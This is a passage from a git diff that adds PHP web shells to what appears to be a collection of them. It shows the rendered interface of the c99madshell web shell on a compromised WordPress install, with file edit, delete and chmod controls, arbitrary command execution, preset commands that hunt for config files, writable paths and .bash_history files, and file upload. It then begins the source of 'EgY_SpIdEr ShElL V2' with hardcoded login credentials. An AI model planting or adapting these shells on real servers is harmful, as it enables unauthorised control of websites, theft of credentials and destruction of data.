onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-feed.php';document.todo.submit();">wp-feed.php</a></td>
+<td>220 B</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-feed.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-feed.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-feed.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-feed.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-feed.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox18" value="/var/www/html/wordpress/wp-feed.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-links-opml.php';document.todo.submit();">wp-links-opml.php</a></td>
+<td>1.9 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links-opml.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" 
onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links-opml.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links-opml.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links-opml.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-links-opml.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox19" value="/var/www/html/wordpress/wp-links-opml.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-links.php';document.todo.submit();">wp-links.php</a></td>
+<td>22.7 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links.php';document.todo.submit();">14.01.2010 11:48:42</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-links.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-links.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" 
onclick="document.todo.act.value='f';document.todo.f.value='wp-links.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-links.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox20" value="/var/www/html/wordpress/wp-links.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-load.php';document.todo.submit();">wp-load.php</a></td>
+<td>2.29 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-load.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-load.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-load.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-load.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-load.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox21" value="/var/www/html/wordpress/wp-load.php"></td>
+</tr> 
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-login.php';document.todo.submit();">wp-login.php</a></td>
+<td>20.73 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-login.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-login.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-login.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-login.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-login.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox22" value="/var/www/html/wordpress/wp-login.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-mail.php';document.todo.submit();">wp-mail.php</a></td>
+<td>6.95 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-mail.php';document.todo.submit();">04.11.2009 16:49:39</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" 
onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-mail.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-mail.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-mail.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-mail.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox23" value="/var/www/html/wordpress/wp-mail.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-pass.php';document.todo.submit();">wp-pass.php</a></td>
+<td>487 B</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-pass.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-pass.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-pass.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" 
onclick="document.todo.act.value='f';document.todo.f.value='wp-pass.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-pass.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox24" value="/var/www/html/wordpress/wp-pass.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-rdf.php';document.todo.submit();">wp-rdf.php</a></td> +<td>218 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rdf.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rdf.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rdf.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rdf.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-rdf.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox25" value="/var/www/html/wordpress/wp-rdf.php"></td> +</tr> +<tr> 
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-register.php';document.todo.submit();">wp-register.php</a></td> +<td>316 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-register.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-register.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-register.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-register.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-register.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox26" value="/var/www/html/wordpress/wp-register.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-rss.php';document.todo.submit();">wp-rss.php</a></td> +<td>218 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" 
onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-rss.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox27" value="/var/www/html/wordpress/wp-rss.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-rss2.php';document.todo.submit();">wp-rss2.php</a></td> +<td>220 B</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss2.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-rss2.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-rss2.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" 
onclick="document.todo.act.value='f';document.todo.f.value='wp-rss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-rss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox28" value="/var/www/html/wordpress/wp-rss2.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-settings.php';document.todo.submit();">wp-settings.php</a></td> +<td>21.02 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-settings.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-settings.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-settings.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-settings.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-settings.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox29" 
value="/var/www/html/wordpress/wp-settings.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-trackback.php';document.todo.submit();">wp-trackback.php</a></td> +<td>3.39 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-trackback.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-trackback.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-trackback.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-trackback.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-trackback.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox30" value="/var/www/html/wordpress/wp-trackback.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-xmlrpc.php';document.todo.submit();">wp-xmlrpc.php</a></td> +<td>21.17 KB</td> +<td><a href="#" 
onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-xmlrpc.php';document.todo.submit();">14.01.2010 10:59:48</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-xmlrpc.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-xmlrpc.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox31" value="/var/www/html/wordpress/wp-xmlrpc.php"></td> +</tr> +<tr> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='xmlrpc.php';document.todo.submit();">xmlrpc.php</a></td> +<td>91.21 KB</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='xmlrpc.php';document.todo.submit();">04.11.2009 16:49:40</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='xmlrpc.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> +<td><a href="#" 
onclick="document.todo.act.value='f';document.todo.f.value='xmlrpc.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='xmlrpc.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox32" value="/var/www/html/wordpress/xmlrpc.php"></td> +</tr> +</table><hr size="1" noshade><p align="right"> + <script> + function ls_setcheckboxall(status) + { + var id = 0; + var num = 33; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 0; + var num = 33; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type="button" onclick="ls_setcheckboxall(1);" value="Select all">&nbsp;&nbsp;<input type="button" onclick="ls_setcheckboxall(0);" value="Unselect all"><b><select name=act><option value="ls">With selected:</option><option value=delete>Delete</option><option value=chmod>Change-mode</option></select>&nbsp;<input type=submit value="Confirm"></p></form></td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: Command execute ::</b></p></td></tr> +<tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><form method="POST"><input type=hidden name=act value="cmd"><input 
type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="cmd" size="50" value=""><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>:: Select ::</b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="/var/www/html/wordpress/"><select name="cmd"><option value="ls -la">-----------------------------------------------------------</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">find config* files</option><option value="find . -type f -name &quot;config*&quot;">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . 
-type f -name .bash_history">find .bash_history files in current dir</option><option value="netstat -an | grep -i listen">show opened ports</option></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center><b>:: Search ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center><b>:: Upload ::</b><form method="POST" name="tod" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="file" name="uploadfile"><input type=submit name=submit value="Upload"><br><font color=green>[ ok ]</font></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="mkdir" size="50" value="/var/www/html/wordpress/">&nbsp;<input type=submit value="Create"><br><font color=green>[ ok ]</font></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" 
value="/var/www/html/wordpress/"><input type="text" name="mkfile" size="50" value="/var/www/html/wordpress/"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><font color=green>[ ok ]</font></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="/var/www/html/wordpress/">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="/var/www/html/wordpress/"><input type="text" name="f" size="50" value="/var/www/html/wordpress/">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. 3.0 BLOG edition<a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET</u></b> </a> ]--</b></p></td></tr></table>
+</body></html>
\ No newline at end of file
diff --git a/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php
new file mode 100644
index 0000000..39bd725
--- /dev/null
+++ b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php
@@ -0,0 +1,6146 @@
+<?
+###########################################
+# EgY_SpIdEr ShElL V2 #
+# EgY_SpIdEr #
+# www.egyspider.eu #
+###########################################
+
+//Change User & Password
+
+$tacfgd['uname'] = 'smowu';
+$tacfgd['pword'] = 'smowu';
+
+
+// Title of page.
+$tacfgd['title'] = 'EgY_SpIdEr ShElL';
+
+// Text to appear just above login form.
+$tacfgd['helptext'] = 'EgY SpIdEr ShElL';
+
+
+// Set to true to enable the optional remember-me feature, which stores encrypted login details to
+// allow users to be logged-in automatically on their return. Turn off for a little extra security.
+$tacfgd['allowrm'] = true;
+
+// If you have multiple protected pages, and there's more than one username / password combination,
+// you need to group each combination under a distinct rmgroup so that the remember-me feature
+// knows which login details to use.
+$tacfgd['rmgroup'] = 'default';
+
+// Set to true if you use your own sessions within your protected page, to stop txtAuth interfering.
+// In this case, you _must_ call session_start() before you require() txtAuth. Logging out will not
+// destroy the session, so that is left up to you.
+$tacfgd['ownsessions'] = false;
+
+
+
+
+foreach ($tacfgd as $key => $val) {
+ if (!isset($tacfg[$key])) $tacfg[$key] = $val;
+}
+
+if (!$tacfg['ownsessions']) {
+ session_name('txtauth');
+ session_start();
+}
+
+// Logout attempt made.
Deletes any remember-me cookie as well
+if (isset($_GET['logout']) || isset($_POST['logout'])) {
+ setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
+ if (!$tacfg['ownsessions']) {
+ $_SESSION = array();
+ session_destroy();
+ }
+ else $_SESSION['txtauthin'] = false;
+}
+// Login attempt made
+elseif (isset($_POST['login'])) {
+ if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) {
+ $_SESSION['txtauthin'] = true;
+ if ($_POST['rm']) {
+ // Set remember-me cookie for 2 weeks
